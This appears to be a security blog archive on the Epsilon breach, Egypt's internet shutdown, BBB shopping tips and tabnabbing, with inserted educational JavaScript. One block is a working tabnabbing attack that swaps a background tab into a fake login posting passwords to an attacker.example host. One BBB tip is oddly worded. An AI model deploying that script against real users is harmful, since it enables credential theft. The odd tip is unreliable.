Archive for the ‘Internet’ Category

Global Spear-Phishing: A New Threat

Thursday, April 7th, 2011

While Charlie Sheen maniacally proclaims his self-induced “winning” status to a saddened, bewildered and exhausted fan base, another growing menace actually seems poised for “winning”.

Consumers got a wake-up call on two fronts with the disclosure of the massive Epsilon Interactive data breach last week.

Our first wake-up call stems from the sheer length of the list of companies that use Epsilon’s email service to reach their customers.

The second wake-up call is the reality that so many trusted brands hand our names and email addresses to a third-party email service provider (ESP), one that has now been exposed as unable to protect the personal data entrusted to it.

The truth is that there is nothing you or I can do to prevent these leaks when the repository for our data is in someone else’s hands.

According to the anti-spam advocacy group CAUCE (Coalition Against Unsolicited Commercial Email), the following financial institutions were affected by the breach:

  • Ameriprise Financial
  • Barclays Bank of Delaware
  • Capital One
  • CITI
  • JP Morgan Chase
  • Moneygram
  • Scottrade
  • TD Ameritrade
  • TIAA-CREF
  • U.S. Bank
  • World Financial Network National Bank (Victoria’s Secret card)

The CAUCE report went on to explain:

“As well, these marketing and retail companies have reportedly had their client email, names and in some cases, other information stolen”:

  1. 1800Flowers.com
  2. AbeBooks (division of Amazon)
  3. Airmiles
  4. Beachbody
  5. Benefit Cosmetics
  6. Best Buy
  7. Best Buy Canada Reward Zone
  8. Brookstone
  9. City Market
  10. CollegeBoard
  11. Dillons
  12. Disney Destinations
  13. Eileen Fisher
  14. Ethan Allen
  15. Food 4 Less
  16. Fred Meyer
  17. Fry’s
  18. Hilton HHonors
  19. Home Shopping Network
  20. Jay C
  21. King Soopers
  22. Krogers
  23. Lacoste
  24. L.L. Bean credit card
  25. Marks and Spencer
  26. Marriott Rewards (Update: Marriott confirmed NO points totals were taken)
  27. McKinsey Quarterly
  28. New York & Company
  29. QFC
  30. Ralphs
  31. Red Roof Inns
  32. Ritz-Carlton (Update: Ritz-Carlton confirmed NO points totals were taken)
  33. Robert Half
  34. Smith’s
  35. Soccer.com
  36. Target
  37. TiVo
  38. Verizon
  39. Viking River Cruises (unconfirmed)
  40. Walgreens (for the second time)

The Epsilon breach is expected to set off a sharp, severe and extended wave of spear-phishing attacks. These attacks will target and exploit the trust relationship between the victimized brands and their customers: a message that appears to come from a company you really do business with, addressed to you by name, is exactly what the stolen names and email addresses make possible.

It is estimated that tens of millions of people’s names and email addresses have been exposed as a result of this breach. In the past three days, our own household has received at least three notifications from worried banks and retailers.

Consumers should brace themselves for what could be a barrage of incoming phishing attempts disguised as communication from a trusted vendor. Although most savvy internet users are aware of these ploys, now is a good time for a few timely reminders.

  • Consumers can report attempted phishing attacks to US-CERT by forwarding the message to phishing-report@us-cert.gov
  • Never click on a link in an email. Type the web address into your browser yourself; a link that looks like your bank’s can point anywhere, including at a malware download or a look-alike login page.
  • Security reporter Brian Krebs reported that more than 100 ESPs (email service providers) have been under attack by fraudsters in recent months. This is an ongoing, sustained effort to grab your information!
  • Gmail, Earthlink and Yahoo all provide tools to help fight spam and phishing attacks.
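The lure such a message depends on is a sender and a link that borrow the brand’s name without being on the brand’s domain. The following is an added example, not code from the original post, that checks an email for exactly that: the sample message, the brand and every domain in it are constructed for illustration, and the two-label “registrable domain” shortcut is an assumption that real code would replace with the Public Suffix List.

```javascript
// Added example (not from the original post): flag the two lures a
// brand-impersonating email relies on. All domains here are made up.

// Constructed sample: the sender and the first link both borrow the
// brand's name without being on the brand's own domain.
const SAMPLE_EMAIL = {
  from: "Example Bank Alerts <alerts@examplebank-security.example>",
  html:
    "<p>Dear customer,</p>" +
    "<p>We noticed unusual activity. Please verify your account at " +
    '<a href="http://examplebank.example.evil-host.example/login">www.examplebank.example</a> ' +
    'or read <a href="https://www.examplebank.example/help">our help page</a>.</p>',
};
const BRAND_DOMAIN = "examplebank.example";

// Last two labels of a host name. Good enough for the sample; production
// code should consult the Public Suffix List (co.uk, com.au, ...).
function registrableDomain(host) {
  return host.toLowerCase().split(".").slice(-2).join(".");
}

// Host name of an absolute URL, or null if it does not parse.
function hostOf(url) {
  try {
    return new URL(url).hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// Domain after the "@" in a From header such as "Name <user@host>".
function senderDomain(fromHeader) {
  const m = /@([^\s>]+)/.exec(fromHeader);
  return m ? m[1].toLowerCase() : null;
}

// Anchors in an HTML body as [{ href, text }], tags stripped from the text.
// A regex is enough for the sample; use a real HTML parser on arbitrary mail.
function extractLinks(html) {
  const re = /<a\b[^>]*\bhref\s*=\s*"([^"]*)"[^>]*>([\s\S]*?)<\/a>/gi;
  const links = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    links.push({ href: m[1], text: m[2].replace(/<[^>]+>/g, "").trim() });
  }
  return links;
}

// Does the link's visible text itself look like a host name or URL?
const LOOKS_LIKE_HOST = /^(https?:\/\/)?[a-z0-9-]+(\.[a-z0-9-]+)+(\/\S*)?$/i;

// Returns [{ kind, detail }]; an empty list means nothing stood out.
//   sender-domain-mismatch: From address is not on the brand's domain
//   link-text-mismatch:     link text names one domain, href goes to another
//   off-brand-link:         a link leads away from the brand's domain
function analyzeEmail(msg, brandDomain) {
  const findings = [];
  const from = senderDomain(msg.from);
  if (from !== null && registrableDomain(from) !== brandDomain) {
    findings.push({ kind: "sender-domain-mismatch", detail: from });
  }
  for (const { href, text } of extractLinks(msg.html)) {
    const hrefHost = hostOf(href);
    if (hrefHost === null) continue;
    if (LOOKS_LIKE_HOST.test(text)) {
      const textHost = hostOf(/^https?:\/\//i.test(text) ? text : "http://" + text);
      if (textHost !== null && registrableDomain(textHost) !== registrableDomain(hrefHost)) {
        findings.push({ kind: "link-text-mismatch", detail: `${text} -> ${hrefHost}` });
      }
    }
    if (registrableDomain(hrefHost) !== brandDomain) {
      findings.push({ kind: "off-brand-link", detail: hrefHost });
    }
  }
  return findings;
}

// Run against the constructed sample: three findings, one of each kind.
console.log(analyzeEmail(SAMPLE_EMAIL, BRAND_DOMAIN));
```

One caveat that follows directly from the post: legitimate mail sent through an ESP often comes from the ESP’s own domain rather than the brand’s, which is the very arrangement the breach exposed, so the sender-domain check alone will also flag real marketing mail. The link-text mismatch is the stronger signal, and neither check replaces typing the address yourself.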

An ancient proverb comes to mind: “Trust in the gods, but tie up your camel anyway!”


How Egypt Pulled The Internet’s Plug

Wednesday, February 2nd, 2011

The Egyptian government has apparently accomplished what many technology experts said could not possibly happen.

Published reports indicate that the “plug” was pulled on Internet access in Egypt on the evening of January 27th, 2011, at about 6 PM local time. According to fraud prevention, monitoring and analytics company iovation, Egyptian use of the internet instantly and almost literally fell off a cliff.

As reported in the blog of noted security expert Robert Siciliano:

NPR reports “Egypt has apparently done what many technologists thought was unthinkable for any country with a major Internet economy: It unplugged itself entirely from the Internet to try and silence dissent. Experts say it’s unlikely that what’s happened in Egypt could happen in the United States because the U.S. has numerous Internet providers and ways of connecting to the Internet. Coordinating a simultaneous shutdown would be a massive undertaking.”

The Los Angeles Times confirmed that both Facebook and Twitter were affected by the outage, and that after a week of unrest the Egyptian government restored Internet access:

“Facebook said in a statement, “We’re pleased that Internet service has been restored and the 5 million people who use Facebook in Egypt can continue using our service to connect, learn, and share.”

Twitter was quickly awash in messages from Egypt after it was restored. Some of the messages asked for donations and medical supplies at hospitals.”

As I write this post, I asked my teenage daughter whether she knew that the internet had been shut down in Egypt. Her answer was revealing: “Yeah, we learned that in school today, Dad.”

Duh. I guess some news travels pretty fast when Big Brother steps aside.

’Tis The Season For Ruthless Online Fraud

Tuesday, December 7th, 2010

The most troubling aspect of the newest WikiLeaks breach is the grim realization that our nation’s most sensitive information can be so vulnerable, so easily accessed and leaked to the world.

You can’t help but wonder: if the U.S. Defense Department can be breached from the inside, just how safe is the personal data belonging to the average U.S. citizen?

Here are 10 tips from the Better Business Bureau (BBB) to help keep you safe online, not just during the holidays but all year long.

The BBB offers this advice:

1. Protect your computer – A computer should always have the most recent updates installed for spam filters, anti-virus and anti-spyware software and a secure firewall.

2. Shop on trustworthy websites – Shoppers should start with BBB to check on the seller’s reputation and record for customer satisfaction. Always look for the BBB seal and other widely-recognized “trustmarks” on retailer websites and click on the seals to confirm that they are valid.

3. Protect your personal information – BBB recommends taking the time to read the site’s privacy policy and understand what personal information is being requested and how it will be used. If there isn’t one posted, it should be taken as a red flag that personal information may be sold to others without permission.

4. Beware of deals that sound too good to be true – Offers on websites and in unsolicited e-mails can often sound too good to be true, especially extremely low prices on hard-to-get items. Consumers should always go with their instincts and not be afraid to pass up a “deal” that might cost them dearly in the end.

5. Beware of phishing – Legitimate businesses do not send e-mails claiming problems with an order or an account to lure the “buyer” into revealing financial information. If a consumer receives such an e-mail, BBB recommends picking up the phone and calling the contact number on the website where the purchase was made to confirm that there really is a problem with the transaction.

6. Confirm your online purchase is secure – Shoppers should always look in the address box for the “s” in https:// and in the lower-right corner for the “lock” symbol before paying. If there are any doubts about a site, BBB recommends right-clicking anywhere on the page and selecting “Properties.” This will let you see the real URL (website address) and the dialog box will reveal if the site is not encrypted.

7. Pay with a credit card – It’s best to use a credit card, because under federal law, the shopper can dispute the charges if he or she doesn’t receive the item. Shoppers also have dispute rights if there are unauthorized charges on their credit card, and many card issuers have “zero liability” policies under which the card holder pays nothing if someone steals the credit card number and uses it. Never wire money and only shop locally on sites like Craigslist.

8. Keep documentation of your order – After completing the online order process, there may be a final confirmation page or the shopper might receive confirmation by e-mail – BBB recommends saving a copy of the Web page and any e-mails for future reference and as a record of the purchase.

9. Check your credit card statements often – Don’t wait for paper statements; BBB recommends consumers check their credit card statements for suspicious activity by either calling credit card companies or by checking statements online regularly.

10. Know your rights – Federal law requires that orders made by mail, phone or online be shipped by the date promised or, if no delivery time was stated, within 30 days. If the goods aren’t shipped on time, the shopper can cancel and demand a refund. There is no general three-day cancellation right, but consumers do have the right to reject merchandise if it’s defective or was misrepresented. Otherwise, it’s the company’s policies that determine if the shopper can cancel the purchase and receive a refund or credit.

From our family at Penn and Associates to yours, enjoy this Christmas holiday season. Expect bigger things from this blog in 2011!

The New Face of Phishing

Tuesday, August 17th, 2010

In the past six months, a dangerous new threat has emerged in the world of internet phishing. Many of us have laughed at the crude and poorly crafted phishing expeditions that invade our inboxes.

Lest any of us fall asleep at the wheel, thinking we are already hip to the rather primitive phishing tactics of the past, this one could easily catch you on its insidious hooks if you don’t read on.

Known as “tabnabbing” (also spelled “tabnapping”), this ploy is designed to psych you out with a behind-the-back switcheroo that hijacks tabs you already have open and catches even savvy observers by surprise. It needs nothing more than a few lines of JavaScript on a page you have already visited. Here’s how it works.

Brian Krebs explains:

“As Mozilla Firefox creative lead Aza Raskin describes it, the attack is as elegant as it is simple: A user has multiple tabs open, and surfs to a site that uses special JavaScript code to silently alter the contents of a tabbed page along with the information displayed on the tab itself, so that when the user switches back to that tab it appears to be the login page for a site the user normally visits.”

In as little as five seconds after you look away, the tabbed page silently changes into a seemingly familiar one (down to the little favicon on the tab) that asks you to re-enter your login credentials. The one thing the script cannot change is the address in the address bar, which still shows the site you originally opened, if you think to look. As soon as you enter your private details, both you and your personal information have literally been “had”.

The best defense against this tricky new tactic is to take a time-out. Whenever a site you visit appears to have “timed out”, take some time out of your browsing frenzy to open a new tab and type the desired URL yourself.

Most browsers, including Safari, Chrome, Firefox and Internet Explorer, claim to watch for tabnabbing attack code and block it. Researchers and hackers alike have been able to sidestep many of the current protections, leaving most browsers vulnerable.

Safety dictates that you don’t log in on any tab that you have not opened yourself. Get into the habit of opening a fresh tab whenever you enter a username or password.
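To make the mechanism concrete, here is an added example, not code from the original post or from Raskin’s demonstration, of a stripped-down tabnabbing page together with the check a password manager effectively performs before it will fill a login form. The imitated brand, the attacker hosts, the five-second delay and the list of “hosts you log in to” are all assumptions made for illustration.

```javascript
// Added example (not from the original post or Raskin's demo): a minimal
// tabnabbing page plus the defender's check. Hosts and timing are assumed.

// How long the tab must stay out of view before it changes. Raskin's
// proof of concept waited a few seconds; 5000 ms is an assumed value.
const SWAP_AFTER_MS = 5000;

// What the tab turns into. Favicon and form action point at hypothetical
// attacker-controlled hosts. window.location is never touched.
const DISGUISE = {
  title: "Sign in - Example Webmail",
  favicon: "https://static.attacker.example/webmail.ico",
  body:
    '<form id="fake-login" method="post" action="https://login.attacker.example/collect">' +
    "<h1>Your session has timed out. Please sign in again.</h1>" +
    '<input name="user" placeholder="Email address">' +
    '<input name="pass" type="password" placeholder="Password">' +
    '<button type="submit">Sign in</button></form>',
};

// Replace title, favicon and body in place. The address bar still shows the
// attacker's URL afterwards: that is the one thing the script cannot fake.
function swapTab(doc, disguise) {
  doc.title = disguise.title;
  let icon = doc.querySelector('link[rel~="icon"]');
  if (!icon) {
    icon = doc.createElement("link");
    icon.rel = "icon";
    doc.head.appendChild(icon);
  }
  icon.href = disguise.favicon;
  doc.body.innerHTML = disguise.body;
  return doc;
}

// Arm the swap: schedule it when the tab is hidden, cancel it if the visitor
// comes back early. Early demos keyed off window blur; the Page Visibility
// API is the current way to learn that a tab is in the background. Timer
// functions are injectable so the handler can be driven without a browser.
function armTabnab(doc, disguise, delayMs, timer = setTimeout, clear = clearTimeout) {
  let pending = null;
  const onVisibility = () => {
    if (doc.hidden) {
      pending = timer(() => {
        pending = null;
        swapTab(doc, disguise);
      }, delayMs);
    } else if (pending !== null) {
      clear(pending); // visitor returned before the delay elapsed
      pending = null;
    }
  };
  doc.addEventListener("visibilitychange", onVisibility);
  return onVisibility;
}

// Defender's side, modelled on what a password manager does: it only offers
// a saved password when the address-bar host is one it was saved for.
// knownLoginHosts is the user's own list (assumed). Checking only where the
// form posts is not enough, since the attacker can post to its own page host.
// Returns warnings; an empty list means the credential forms look legitimate.
function credentialFormWarnings(forms, pageHost, knownLoginHosts) {
  const warnings = [];
  for (const form of forms) {
    if (form.querySelector('input[type="password"]') === null) continue;
    if (!knownLoginHosts.includes(pageHost)) {
      warnings.push(`password field on ${pageHost}, which is not a host you log in to`);
    }
    const action = form.getAttribute("action") || "";
    const actionHost = new URL(action, "https://" + pageHost).hostname;
    if (actionHost !== pageHost) {
      warnings.push(`form posts to ${actionHost}, not ${pageHost}`);
    }
  }
  return warnings;
}

// In a browser this arms the attack on the page that loaded the script;
// under Node there is no document and nothing runs.
if (typeof document !== "undefined") {
  armTabnab(document, DISGUISE, SWAP_AFTER_MS);
}
```

In a browser console, `credentialFormWarnings(document.querySelectorAll("form"), location.hostname, ["mail.example"])` on the swapped tab reports both that the host is not one you log in to and that the form posts elsewhere; an attacker who posts to the page’s own host silences the second warning but not the first, which is why the check on the address-bar host is the one that matters.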

If you forget to refresh previously opened and familiar login pages, one day soon you could literally open up a fresh can of worms.